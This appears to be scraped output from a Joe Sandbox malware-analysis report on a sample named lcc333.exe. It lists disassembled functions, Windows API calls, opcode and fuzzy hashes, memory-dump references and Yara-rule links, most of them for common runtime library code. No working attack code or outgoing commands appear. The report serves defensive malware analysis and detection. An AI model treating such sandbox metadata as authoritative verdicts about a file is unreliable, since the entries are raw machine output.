                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                          • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                          • Instruction ID: 2cf3136ef9ea19527f6d4696242c1e69462ee81e31dca19eb49a78ceae1dd291
                                                                                                                                                          • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                          • Instruction Fuzzy Hash: 4AF04462609E0791EB10AF26E8D4376A320EF46BB1F940A36D66E452E4EF2CD14CC320
                                                                                                                                                          Function 00007FF714CA9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                          • Instruction ID: 3f46217f0e4d57f24b0805be76721b64fd3c2360521ab1c04c76524f23151af1
                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                          • Instruction Fuzzy Hash: 9611632BD59E0201F6543D57E4D33F99060AF5BB70FA40E37EB6F162EAAE6C68494130
                                                                                                                                                          Function 00007FF714C9B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF714C9A5A3,?,?,00000000,00007FF714C9A83E,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9B3AF
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C9A5A3,?,?,00000000,00007FF714C9A83E,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9B3CE
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C9A5A3,?,?,00000000,00007FF714C9A83E,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9B3F6
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C9A5A3,?,?,00000000,00007FF714C9A83E,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9B407
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C9A5A3,?,?,00000000,00007FF714C9A83E,?,?,?,?,?,00007FF714C9A7CA), ref: 00007FF714C9B418
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                          • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                          • Instruction ID: a49f618044e34c5fba2e57d1970284e5ef76f8237023c538ec76d471b09641d5
                                                                                                                                                          • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                          • Instruction Fuzzy Hash: 31116020E08E4271FA54BF27DED1139A2416F467B0FD89736EA2D46BC6FE2CA4094620
                                                                                                                                                          Function 00007FF714C9B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                          • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                          • Instruction ID: c057b87d0e2c05a8f2f117c4e11abf5588a28432ec48a62aea3a7b0e673dd4f8
                                                                                                                                                          • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                          • Instruction Fuzzy Hash: CA11E320A08E0771F9587E67CCE117D9182AF47B70ED49736D92E4A6C2FD2DB4488621
                                                                                                                                                          Function 00007FF714C95FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID: verbose
                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                          • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                          • Instruction ID: 1e98410c8ccb1e3947d524e7417bd4286982eeb517a6268bf2f13c4cf3db1b79
                                                                                                                                                          • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                          • Instruction Fuzzy Hash: 0A91B332B08E46A1EB65AF26DC9037DB691AB42B64FC44137DA5D473D5EE3DE409C320
                                                                                                                                                          Function 00007FF714C9FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                          • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                          • Instruction ID: 774148b3078cfb43542f77ca6604a6bbda1c6c96162efc9448f054e7dc94f01a
                                                                                                                                                          • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                          • Instruction Fuzzy Hash: 8E81B673D08D43E5F7757E27C9E0278B6A0AB13764FD98033C90997295EB2CE9498321
                                                                                                                                                          Function 00007FF714C8D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                          • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                          • Instruction ID: 3842733fd99f19469528eda55f38187808424c2efab3c3c898b504a4f46cd9bf
                                                                                                                                                          • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                          • Instruction Fuzzy Hash: 3651D536B19A038ADB14EF16E085A78B391FB45BA8F908136DE4E47748DF7CE846C750
                                                                                                                                                          Function 00007FF714C8EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                          • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                          • Instruction ID: cb279c93c053ee0da8ebb2cb14711549d334f90ecc99443da5fa6158db297dc4
                                                                                                                                                          • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                          • Instruction Fuzzy Hash: 3C619432908BC685D760AF16E4813AAF7A0FB867A4F444236EB9C47755DF7CE194CB10
                                                                                                                                                          Function 00007FF714C8F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                          • Instruction ID: 4ea2c7d51dc269bafd4ba223138c073a501b1b463fa71a2b026e0678a473fa8a
                                                                                                                                                          • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 3F518132608A4386EB64AF2390A527CB790EB96BA4F944137DB4D47B95CF3CE458C711
                                                                                                                                                          Function 00007FF714C82810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                          • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                          • Instruction ID: 6bae0e05981b10fd77837118e0639a85e0dcd7f7e66c35e593303d2305e293f9
                                                                                                                                                          • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                          • Instruction Fuzzy Hash: 0421D173B08F4192E710AF16F8857EAA7A0FB89794F800536EA8D53659EF3CD249C750
                                                                                                                                                          Function 00007FF714C9C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                          • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                          • Instruction ID: ed86ab598834cdc9a7c725bce550607738d3b2fca521eb414e1e4179b15ab268
                                                                                                                                                          • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                          • Instruction Fuzzy Hash: 75D12872B08E4199E710DF76D8801AC77B1FB56BA8B904236DE5E97B85EE38D00AC310
                                                                                                                                                          Function 00007FF714C820C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                          • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                          • Instruction ID: 82be28a528ddf5e7177af14b022ab22130bc4bcb810bbb08ab3ab1ddff55accd
                                                                                                                                                          • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                          • Instruction Fuzzy Hash: 8911EC25B0C94342F654AF6BE5C9279D292EF86BA0FD44432DB4907B89DD3DD8C98210
                                                                                                                                                          Function 00007FF714CA5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                          • String ID: ?
                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                          • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                          • Instruction ID: 90ef9206d4bcdc8d59a2db30ab1b761fde37fde00193e9ab8c85276af3936a25
                                                                                                                                                          • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                          • Instruction Fuzzy Hash: 82415E13A08A8155F7206F17E481379E790EBA2FB4FA48636EE5C06AD5FF3CD4498710
                                                                                                                                                          Function 00007FF714C99014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF714C99046
                                                                                                                                                            • Part of subcall function 00007FF714C9A948: RtlFreeHeap.NTDLL(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A95E
                                                                                                                                                            • Part of subcall function 00007FF714C9A948: GetLastError.KERNEL32(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A968
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF714C8CBA5), ref: 00007FF714C99064
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                          • String ID: C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                          • API String ID: 3580290477-38780731
                                                                                                                                                          • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                          • Instruction ID: 71729fce6725df4061853aa22a7a30f860230ca9508e0dafe51362d109a11676
                                                                                                                                                          • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                          • Instruction Fuzzy Hash: 45419336A08F52A5EB14BF27D8C00FDA3A5FB467E0B955036E94D43785EE3DD4898320
                                                                                                                                                          Function 00007FF714C9CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                          • String ID: U
                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                          • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                          • Instruction ID: 80f87d26282ef0067db7de58990efdde1617431b379c01b7040b2471a7c1b953
                                                                                                                                                          • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                          • Instruction Fuzzy Hash: 0241B473B18E4191DB209F26E8843A9A760FB89BA4F944132EE4D87794EF3CD405C750
                                                                                                                                                          Function 00007FF714C9F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
